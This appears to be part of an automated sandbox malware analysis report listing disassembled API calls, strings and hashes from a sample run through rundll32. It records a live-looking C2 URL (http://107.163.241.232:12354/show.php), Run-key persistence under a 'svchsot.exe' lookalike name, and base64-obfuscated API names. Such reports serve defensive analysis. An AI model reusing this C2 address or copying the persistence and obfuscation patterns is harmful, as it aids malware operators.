                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseInfoOpenQuerySleep
                                                • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                                • API String ID: 2225969182-2172464104
                                                • Opcode ID: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
                                                • Instruction ID: 8391b5504ccf8cab49b59508a831428093b3ef4b36d771d3e57068c3abc199ad
                                                • Opcode Fuzzy Hash: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
                                                • Instruction Fuzzy Hash: 00313D71209342AFE311CF55CC84FABB7E9FBC9B44F40492DF28596184DA74EA05CBA2
                                                APIs
                                                • WSAStartup.WS2_32(00000202), ref: 10008DD4
                                                  • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                • GetLastError.KERNEL32 ref: 10008DFA
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00008A70,?,00000000,00000000), ref: 10008E20
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008E27
                                                • CloseHandle.KERNEL32(00000000), ref: 10008E2A
                                                • Sleep.KERNEL32(00002710), ref: 10008E35
                                                • CloseHandle.KERNEL32(00000000), ref: 10008E3E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                                • String ID:
                                                • API String ID: 3243752880-0
                                                • Opcode ID: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
                                                • Instruction ID: a359fb298355683a4573c8a866c24d0698d26be9667dacd13f7a321984fbe110
                                                • Opcode Fuzzy Hash: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
                                                • Instruction Fuzzy Hash: C9012875244260BBF2219760DC4EF9E3B68FB8A7A0F114224FB18961C2C7B4691083BB
                                                APIs
                                                Strings
                                                • http://107.163.241.232:12354/show.php, xrefs: 10009553
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Sleep$wsprintf
                                                • String ID: http://107.163.241.232:12354/show.php
                                                • API String ID: 3195947292-2344152501
                                                • Opcode ID: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
                                                • Instruction ID: d4c08372696571601e49f361774c7e6739f4c64afbccb80dc67fb9e03b5bb553
                                                • Opcode Fuzzy Hash: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
                                                • Instruction Fuzzy Hash: 26315E71504A856BF365CA34CC92ADB3BC7EB853D0F11492CF6858B189EA37D9498352
                                                APIs
                                                • lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                • 6CEE2C70.MFC42(00000001,?,74DF0F00), ref: 1000115C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcpy
                                                • String ID: VUUU
                                                • API String ID: 3722407311-2040033107
                                                • Opcode ID: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                • Instruction ID: c786a2ff591aff92977bd3f5140d7e1907602f98ed4a153bb8b8b05817a39e60
                                                • Opcode Fuzzy Hash: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
                                                • Instruction Fuzzy Hash: AF416B31B0049207F32DC62C8CB227ABBD2DB922C0B54813EE6C7C7256D9A2DD66C350
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: _inittermfreemalloc
                                                • String ID:
                                                • API String ID: 1678931842-0
                                                • Opcode ID: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
                                                • Instruction ID: ad2f920e9778d69807a12391a49186a6d5e25611a08f9dc3c907af6526498538
                                                • Opcode Fuzzy Hash: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
                                                • Instruction Fuzzy Hash: A4112E32648226ABE718CB64EDD5F8977A5FB05295F158019E901CB2A0E732E890CB95
                                                APIs
                                                • GetProcAddress.KERNEL32(73AC0000,00000000), ref: 100025A4
                                                Strings
                                                • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002590
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                                • API String ID: 190572456-980335172
                                                • Opcode ID: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
                                                • Instruction ID: e2bb3045dcad879353c92d9ca582775d4a1260cfb397e564f33c378eb59ea92b
                                                • Opcode Fuzzy Hash: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
                                                • Instruction Fuzzy Hash: 9CC04CF58007109BF642DBA49D85B4A3799E74C28AB018424F51DD222AE734E2959B15
                                                APIs
                                                • GetProcAddress.KERNEL32(73AC0000,00000000), ref: 10002664
                                                Strings
                                                • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002650
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: AddressProc
                                                • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                                • API String ID: 190572456-3244026974
                                                • Opcode ID: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
                                                • Instruction ID: 0ade1f184abd6a37764815a29ceca78810d2d009be9ca9e5ee1f1b4efe6a2c35
                                                • Opcode Fuzzy Hash: 5da32a4a5574a052550975bb5b0bbc93ab09694d4bcd5f2703c64bdbfbfc511d
                                                • Instruction Fuzzy Hash: AFC08CF88006205BF642CB608C84B0A3398E30C38AB008010F659D222AD730E1A08B11
                                                APIs
                                                  • Part of subcall function 1000B0A0: lstrcpy.KERNEL32(?,?), ref: 1000B0D9
                                                  • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,10019BD4), ref: 1000B0F2
                                                  • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,*.*), ref: 1000B101
                                                  • Part of subcall function 1000B0A0: FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113
                                                • Sleep.KERNEL32(0036EE80), ref: 1000B686
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                                • String ID: C:\Program Files
                                                • API String ID: 187370985-1387799010
                                                • Opcode ID: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
                                                • Instruction ID: 61b073742c814ce492014a967659e3b424d997019ce0857d6221e672e47afb5b
                                                • Opcode Fuzzy Hash: 104c4d2efdd1e2322e4b23a01710967e339c577f5a1987c4c7f9844ac907495e
                                                • Instruction Fuzzy Hash: 3E113CB88057559BF300DF69ECD15477BE0FB84684F008929E85587316E735D649CBA3
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03380625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03380658
                                                Memory Dump Source
                                                • Source File: 00000005.00000003.1697705613.0000000003380000.00000040.00001000.00020000.00000000.sdmp, Offset: 03380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_3_3380000_rundll32.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: ad8fccde4c0dc4423abfe53a4f7b411d98761f7a81d8181a87cfba26fd0598ee
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 6B215775A01319BFDB00DFA4CC80BEEFBF9FB44294F208162E910A2280E7708A599B54
                                                APIs
                                                • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                APIs
                                                • CreateFileA.KERNEL32(00000003,00000003,00000003,00000003,00000003,40000000,?,1000BBE4,c:\agtve\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004B63
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                APIs
                                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,74DF0F10,?,1000AAC6,?,74DF0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: QueryValue
                                                • String ID:
                                                • API String ID: 3660427363-0
                                                APIs
                                                • RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Value
                                                • String ID:
                                                • API String ID: 3702945584-0
                                                APIs
                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000497E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID:
                                                • API String ID: 2038078732-0
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(?,?,?,?,00020019,1000AA61,80000002,1000B947,00000000,00020019,?,?,?,74DF0F00), ref: 10004CB9
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                APIs
                                                • InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: InternetOpen
                                                • String ID:
                                                • API String ID: 2038078732-0
                                                APIs
                                                • SetFilePointer.KERNEL32(00000080,00000080,00000004,00000000,1000BBF2,00000000,00000000,00000000,00000002,c:\agtve\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004A94
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                APIs
                                                • CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CreateMutex
                                                • String ID:
                                                • API String ID: 1964310414-0
                                                APIs
                                                • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID:
                                                • API String ID: 1295925010-0
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C26F98), ref: 100014B6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C25F90), ref: 100014E6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                APIs
                                                • Process32First.KERNEL32(00000000,00000000), ref: 10004D1A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: FirstProcess32
                                                • String ID:
                                                • API String ID: 2623510744-0
                                                APIs
                                                • LoadLibraryA.KERNEL32(04C21050), ref: 10001546
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                APIs
                                                • Process32Next.KERNEL32(?,00000000), ref: 10004D3A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: NextProcess32
                                                • String ID:
                                                • API String ID: 1850201408-0
                                                APIs
                                                • LoadLibraryA.KERNEL32(033FD0A0), ref: 100015A6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
                                                • Instruction ID: 22283fd24f107b37298acc13f8db5db648e85e1336fc49587faefca2ed5f0806
                                                • Opcode Fuzzy Hash: b8e4ff15c4138358dcbf467bb1e805bc5a866f0c9e2c71367f6b70752848133d
                                                • Instruction Fuzzy Hash: 24B092B0850924CBF612CB608CC840B3774A78C2423408201F915C7225E730C010DB10
                                                APIs
                                                • LoadLibraryA.KERNEL32(033FA088), ref: 10001636
                                                Memory Dump Source
